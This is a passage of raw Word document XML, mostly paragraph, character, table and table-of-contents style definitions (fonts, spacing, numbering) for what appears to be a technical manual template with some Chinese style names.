    <w:rsid w:val="00FE2EA1"/>
    <w:rsid w:val="00FE41EB"/>
    <w:rsid w:val="00FE548E"/>
    <w:rsid w:val="00FF0B83"/>
    <w:rsid w:val="00FF0F4D"/>
    <w:rsid w:val="00FF125B"/>
    <w:rsid w:val="00FF25A3"/>
    <w:rsid w:val="00FF304D"/>
    <w:rsid w:val="00FF33B1"/>
    <w:rsid w:val="00FF3E92"/>
    <w:rsid w:val="00FF507D"/>
    <w:rsid w:val="00FF53F8"/>
    <w:rsid w:val="00FF5AF1"/>
    <w:rsid w:val="00FF5BFF"/>
    <w:rsid w:val="00FF6F59"/>
    <w:rsid w:val="00FF7B3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59BB8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7A9A8C57-849A-416B-A922-E8983C13A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2">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00A0413E"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="2"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BA6351"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="1600" w:after="800" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Book Antiqua"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="3"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00733C70"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="600" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Book Antiqua"/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="11"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="11"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="200"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="51"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B1637A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:bCs/>
      <w:kern w:val="2"/>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35A18"/>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customStyle="1" w:styleId="a7">
    <w:name w:val="页眉字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="页脚字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeadingLeft">
    <w:name w:val="Heading Left"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="000460E1"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BA6351"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Book Antiqua"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00733C70"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Book Antiqua"/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00281AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00281AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BlockLabel">
    <w:name w:val="Block Label"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="300"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Book Antiqua"/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureDescription">
    <w:name w:val="Figure Description"/>
    <w:next w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="240" w:after="40" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="1049"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
      <w:spacing w:val="-4"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemStep">
    <w:name w:val="Item Step"/>
    <w:rsid w:val="00F8536F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1481"/>
      </w:tabs>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableDescription">
    <w:name w:val="Table Description"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="00074FFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="40" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="1525"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:spacing w:val="-4"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="批注框文本字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="1Char"/>
    <w:qFormat/>
    <w:rsid w:val="007A069F"/>
    <w:pPr>
      <w:ind w:leftChars="650" w:left="650"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="fig1">
    <w:name w:val="fig1"/>
    <w:basedOn w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="00B423D5"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="650" w:left="650"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:noProof/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="111111">
    <w:name w:val="Outline List 2"/>
    <w:basedOn w:val="a5"/>
    <w:semiHidden/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemList">
    <w:name w:val="Item List"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00B423D5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:ind w:leftChars="0" w:left="2041" w:hanging="482"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemListText">
    <w:name w:val="Item List Text"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="007760AB"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:ind w:leftChars="850" w:left="850"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubItemList">
    <w:name w:val="Sub Item List"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="SubItemListChar"/>
    <w:qFormat/>
    <w:rsid w:val="005F66C0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="2489" w:hanging="448"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubItemListText">
    <w:name w:val="Sub Item List Text"/>
    <w:basedOn w:val="11"/>
    <w:rsid w:val="00294B0B"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:ind w:leftChars="920" w:left="920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemlistTextTD">
    <w:name w:val="Item list Text TD"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00366E89"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="850" w:left="850"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubItemListTextTD">
    <w:name w:val="Sub Item List Text TD"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00366E89"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="1050" w:left="1050"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TerminalDisplay">
    <w:name w:val="Terminal Display"/>
    <w:qFormat/>
    <w:rsid w:val="005F66C0"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="650" w:left="650"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:val="-1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:basedOn w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Arial"/>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TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="000F2665"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Book Antiqua"/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac">
    <w:name w:val="Table Professional"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>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
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="00601194"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemListinTable">
    <w:name w:val="Item List in Table"/>
    <w:basedOn w:val="ItemList"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:ind w:left="340" w:hanging="340"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AboutThisChapter">
    <w:name w:val="About This Chapter"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="600" w:after="560" w:line="240" w:lineRule="atLeast"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Book Antiqua" w:eastAsia="黑体" w:hAnsi="Book Antiqua" w:cs="Book Antiqua"/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Step">
    <w:name w:val="Step"/>
    <w:qFormat/>
    <w:rsid w:val="002777C4"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1701"/>
      </w:tabs>
      <w:topLinePunct/>
      <w:spacing w:line="320" w:lineRule="exact"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="List Number 5"/>
    <w:basedOn w:val="a2"/>
    <w:semiHidden/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="160" w:after="160" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:cs="Arial"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="文档结构图字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="a2"/>
    <w:semiHidden/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="160" w:after="160" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:cs="Arial"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af0"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="标题字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af2"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="240" w:after="60" w:line="312" w:lineRule="atLeast"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="副标题字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af1"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00835A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1NoNumber">
    <w:name w:val="Heading1 No Number"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading2NoNumber">
    <w:name w:val="Heading2 No Number"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="160" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Book Antiqua"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00596E7A"/>
    <w:pPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="300" w:left="300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="450" w:left="450"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
